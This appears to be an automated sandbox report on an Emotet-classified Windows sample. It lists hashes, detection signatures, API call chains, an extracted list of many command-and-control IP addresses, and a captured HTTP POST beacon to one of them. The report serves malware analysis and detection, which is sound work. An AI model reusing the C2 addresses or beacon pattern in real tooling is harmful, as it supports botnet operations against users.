Analysis Report 2ojdmC51As.exe

Overview

General Information

Sample Name: 2ojdmC51As.exe
Analysis ID: 319735
MD5: 5804d97670dcdfab88ba830682355dad
SHA1: 65c817fb511824fa185f34ecd744b836ed7a19eb
SHA256: 4e885ada930e285a005c5211b8a652dc0eb11a06ccf530561afa88aefe99c9fc

Most interesting Screenshot:

Detection

Emotet
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for sample
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains strange resources
Potential key logger detected (key state polling based)
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000001.00000002.931629655.0000000002220000.00000040.00000001.sdmp Malware Configuration Extractor: Emotet {"C2 list": ["200.116.145.225:443", "96.126.101.6:8080", "5.196.108.185:8080", "167.114.153.111:8080", "194.187.133.160:443", "98.174.164.72:80", "103.86.49.11:8080", "78.24.219.147:8080", "50.245.107.73:443", "110.145.77.103:80", "94.200.114.161:80", "61.19.246.238:443", "194.4.58.192:7080", "209.54.13.14:80", "102.182.93.220:80", "186.70.56.94:443", "203.153.216.189:7080", "49.50.209.131:80", "176.113.52.6:443", "62.30.7.67:443", "61.76.222.210:80", "113.61.66.94:80", "157.245.99.39:8080", "216.139.123.119:80", "184.180.181.202:80", "123.142.37.166:80", "124.41.215.226:80", "119.59.116.21:8080", "41.185.28.84:8080", "5.39.91.110:7080", "220.245.198.194:80", "139.162.108.71:8080", "75.143.247.51:80", "74.214.230.200:80", "185.94.252.104:443", "208.180.207.205:80", "49.3.224.99:8080", "93.147.212.206:80", "182.208.30.18:443", "95.213.236.64:8080", "37.187.72.193:8080", "59.125.219.109:443", "37.179.204.33:80", "95.9.5.93:80", "168.235.67.138:7080", "118.83.154.64:443", "121.7.31.214:80", "74.208.45.104:8080", "87.106.136.232:8080", "138.68.87.218:443", "62.75.141.82:80", "66.76.12.94:8080", "202.134.4.216:8080", "47.36.140.164:80", "110.142.236.207:80", "134.209.144.106:443", "89.216.122.92:80", "75.188.96.231:80", "24.179.13.119:80", "218.147.193.146:80", "174.106.122.139:80", "71.15.245.148:8080", "104.131.11.150:443", "202.141.243.254:443", "94.230.70.6:80", "24.178.90.49:80", "97.82.79.83:80", "68.252.26.78:80", "173.63.222.65:80", "162.241.242.173:8080", "79.137.83.50:443", "80.241.255.202:8080", "120.150.60.189:80", "96.245.227.43:80", "50.91.114.38:80", "83.110.223.58:443", "24.230.141.169:80", "37.139.21.175:8080", "202.134.4.211:8080", "190.240.194.77:443", "176.111.60.55:8080", "123.176.25.234:80", "209.141.54.221:7080", "115.94.207.99:443", "50.35.17.13:80", "109.74.5.95:8080", "120.150.218.241:443", "121.124.124.40:7080", "217.20.166.178:7080", "108.46.29.236:80", "2.58.16.89:8080", "85.105.111.166:80", "137.59.187.107:8080", "139.162.60.124:8080", "76.175.162.101:80", "139.99.158.11:443", "104.131.123.136:443", "91.211.88.52:7080", "91.146.156.228:80", "172.104.97.173:8080", "89.121.205.18:80", "186.74.215.34:80", "61.33.119.226:443", "162.241.140.129:8080", "130.0.132.242:80", "190.108.228.27:443", "201.241.127.190:80", "87.106.139.101:8080", "78.188.106.53:443", "188.219.31.12:80", "76.171.227.238:80", "72.143.73.234:443", "62.171.142.179:8080", "139.59.60.244:8080", "24.137.76.62:80", "172.86.188.251:8080", "172.91.208.86:80", "94.23.237.171:443", "200.116.145.225:443", "96.126.101.6:8080", "5.196.108.185:8080", "167.114.153.111:8080", "194.187.133.160:443", "98.174.164.72:80", "103.86.49.11:8080", "78.24.219.147:8080", "50.245.107.73:443", "110.145.77.103:80", "94.200.114.161:80", "61.19.246.238:443", "194.4.58.192:7080", "209.54.13.14:80", "102.182.93.220:80", "186.70.56.94:443", "203.153.216.189:7080", "49.50.209.131:80", "176.113.52.6:443", "62.30.7.67:443", "61.76.222.210:80", "113.61.66.94:80", "157.245.99.39:8080", "
Source: 00000001.00000002.931629655.0000000002220000.00000040.00000001.sdmp Malware Configuration Extractor: Emotet {"C2 list": ["200.116.145.225:443", "96.126.101.6:8080", "5.196.108.185:8080", "167.114.153.111:8080", "194.187.133.160:443", "98.174.164.72:80", "103.86.49.11:8080", "78.24.219.147:8080", "50.245.107.73:443", "110.145.77.103:80", "94.200.114.161:80", "61.19.246.238:443", "194.4.58.192:7080", "209.54.13.14:80", "102.182.93.220:80", "186.70.56.94:443", "203.153.216.189:7080", "49.50.209.131:80", "176.113.52.6:443", "62.30.7.67:443", "61.76.222.210:80", "113.61.66.94:80", "157.245.99.39:8080", "216.139.123.119:80", "184.180.181.202:80", "123.142.37.166:80", "124.41.215.226:80", "119.59.116.21:8080", "41.185.28.84:8080", "5.39.91.110:7080", "220.245.198.194:80", "139.162.108.71:8080", "75.143.247.51:80", "74.214.230.200:80", "185.94.252.104:443", "208.180.207.205:80", "49.3.224.99:8080", "93.147.212.206:80", "182.208.30.18:443", "95.213.236.64:8080", "37.187.72.193:8080", "59.125.219.109:443", "37.179.204.33:80", "95.9.5.93:80", "168.235.67.138:7080", "118.83.154.64:443", "121.7.31.214:80", "74.208.45.104:8080", "87.106.136.232:8080", "138.68.87.218:443", "62.75.141.82:80", "66.76.12.94:8080", "202.134.4.216:8080", "47.36.140.164:80", "110.142.236.207:80", "134.209.144.106:443", "89.216.122.92:80", "75.188.96.231:80", "24.179.13.119:80", "218.147.193.146:80", "174.106.122.139:80", "71.15.245.148:8080", "104.131.11.150:443", "202.141.243.254:443", "94.230.70.6:80", "24.178.90.49:80", "97.82.79.83:80", "68.252.26.78:80", "173.63.222.65:80", "162.241.242.173:8080", "79.137.83.50:443", "80.241.255.202:8080", "120.150.60.189:80", "96.245.227.43:80", "50.91.114.38:80", "83.110.223.58:443", "24.230.141.169:80", "37.139.21.175:8080", "202.134.4.211:8080", "190.240.194.77:443", "176.111.60.55:8080", "123.176.25.234:80", "209.141.54.221:7080", "115.94.207.99:443", "50.35.17.13:80", "109.74.5.95:8080", "120.150.218.241:443", "121.124.124.40:7080", "217.20.166.178:7080", "108.46.29.236:80", "2.58.16.89:8080", "85.105.111.166:80", "137.59.187.107:8080", "139.162.60.124:8080", "76.175.162.101:80", "139.99.158.11:443", "104.131.123.136:443", "91.211.88.52:7080", "91.146.156.228:80", "172.104.97.173:8080", "89.121.205.18:80", "186.74.215.34:80", "61.33.119.226:443", "162.241.140.129:8080", "130.0.132.242:80", "190.108.228.27:443", "201.241.127.190:80", "87.106.139.101:8080", "78.188.106.53:443", "188.219.31.12:80", "76.171.227.238:80", "72.143.73.234:443", "62.171.142.179:8080", "139.59.60.244:8080", "24.137.76.62:80", "172.86.188.251:8080", "172.91.208.86:80", "94.23.237.171:443", "200.116.145.225:443", "96.126.101.6:8080", "5.196.108.185:8080", "167.114.153.111:8080", "194.187.133.160:443", "98.174.164.72:80", "103.86.49.11:8080", "78.24.219.147:8080", "50.245.107.73:443", "110.145.77.103:80", "94.200.114.161:80", "61.19.246.238:443", "194.4.58.192:7080", "209.54.13.14:80", "102.182.93.220:80", "186.70.56.94:443", "203.153.216.189:7080", "49.50.209.131:80", "176.113.52.6:443", "62.30.7.67:443", "61.76.222.210:80", "113.61.66.94:80", "157.245.99.39:8080", "
Machine Learning detection for sample
Source: 2ojdmC51As.exe Joe Sandbox ML: detected
Source: 2ojdmC51As.exe Joe Sandbox ML: detected

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02272650 CryptAcquireContextW,CryptGenKey,CryptCreateHash,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptDecodeObjectEx, 1_2_02272650
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02272290 CryptGetHashParam,CryptEncrypt,CryptDestroyHash,CryptDuplicateHash,memcpy,CryptExportKey,GetProcessHeap,RtlAllocateHeap, 1_2_02272290
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02271FB0 memcpy,GetProcessHeap,RtlAllocateHeap,CryptVerifySignatureW,CryptDestroyHash,CryptDecrypt,CryptDuplicateHash, 1_2_02271FB0
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02272650 CryptAcquireContextW,CryptGenKey,CryptCreateHash,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptDecodeObjectEx, 1_2_02272650
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02272290 CryptGetHashParam,CryptEncrypt,CryptDestroyHash,CryptDuplicateHash,memcpy,CryptExportKey,GetProcessHeap,RtlAllocateHeap, 1_2_02272290
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02271FB0 memcpy,GetProcessHeap,RtlAllocateHeap,CryptVerifySignatureW,CryptDestroyHash,CryptDecrypt,CryptDuplicateHash, 1_2_02271FB0
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_004182CC FindFirstFileA,FindClose, 0_2_004182CC
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00417B29 __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA, 0_2_00417B29
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_022338F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,FindFirstFileW,_snwprintf,FindClose, 0_2_022338F0
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_004182CC FindFirstFileA,FindClose, 0_2_004182CC
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00417B29 __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA, 0_2_00417B29
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_022338F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,FindFirstFileW,_snwprintf,FindClose, 0_2_022338F0
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_004182CC FindFirstFileA,FindClose, 1_2_004182CC
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_00417B29 __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA, 1_2_00417B29
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_022738F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,_snwprintf,FindClose,FindClose, 1_2_022738F0

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2404324 ET CNC Feodo Tracker Reported CnC Server TCP group 13 192.168.2.4:49742 -> 200.116.145.225:443
Source: Traffic Snort IDS: 2404324 ET CNC Feodo Tracker Reported CnC Server TCP group 13 192.168.2.4:49742 -> 200.116.145.225:443
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: EPMTelecomunicacionesSAESPCO EPMTelecomunicacionesSAESPCO
Source: Joe Sandbox View ASN Name: EPMTelecomunicacionesSAESPCO EPMTelecomunicacionesSAESPCO
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /0SatF/P7qctngEpv1Ya3fD3/jr1xjmE/NHdOxCQtbKORku0/xlzXExMFhF/ibPm1TBkGiQpYm/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 200.116.145.225/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=---------hcIbcONokUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 200.116.145.225:443Content-Length: 4628Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /0SatF/P7qctngEpv1Ya3fD3/jr1xjmE/NHdOxCQtbKORku0/xlzXExMFhF/ibPm1TBkGiQpYm/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 200.116.145.225/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=---------hcIbcONokUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 200.116.145.225:443Content-Length: 4628Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 200.116.145.225
Source: unknown TCP traffic detected without corresponding DNS query: 200.116.145.225
Source: unknown TCP traffic detected without corresponding DNS query: 200.116.145.225
Source: unknown TCP traffic detected without corresponding DNS query: 200.116.145.225
Source: unknown TCP traffic detected without corresponding DNS query: 200.116.145.225
Source: unknown TCP traffic detected without corresponding DNS query: 200.116.145.225
Source: unknown TCP traffic detected without corresponding DNS query: 200.116.145.225
Source: unknown TCP traffic detected without corresponding DNS query: 200.116.145.225
Source: unknown TCP traffic detected without corresponding DNS query: 200.116.145.225
Source: unknown TCP traffic detected without corresponding DNS query: 200.116.145.225
Source: unknown TCP traffic detected without corresponding DNS query: 200.116.145.225
Source: unknown TCP traffic detected without corresponding DNS query: 200.116.145.225
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_022729B0 InternetReadFile,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,HttpQueryInfoW, 1_2_022729B0
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_022729B0 InternetReadFile,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,HttpQueryInfoW, 1_2_022729B0
Source: svchost.exe, 00000006.00000003.758933962.0000027873F2A000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.facebook.com (Facebook)
Source: svchost.exe, 00000006.00000003.758933962.0000027873F2A000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.twitter.com (Twitter)
Source: svchost.exe, 00000006.00000003.758933962.0000027873F2A000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2020-11-16T08:29:46.4904070Z||.||18ebec36-1675-40c0-a5d4-25e9e774360f||1152921505692410033||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 00000006.00000003.758933962.0000027873F2A000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2020-11-16T08:29:46.4904070Z||.||18ebec36-1675-40c0-a5d4-25e9e774360f||1152921505692410033||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 00000006.00000003.758971863.0000027873F66000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI", equals www.facebook.com (Facebook)
Source: svchost.exe, 00000006.00000003.758971863.0000027873F66000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI", equals www.twitter.com (Twitter)
Source: svchost.exe, 00000006.00000003.753689942.0000027873F58000.00000004.00000001.sdmp String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC",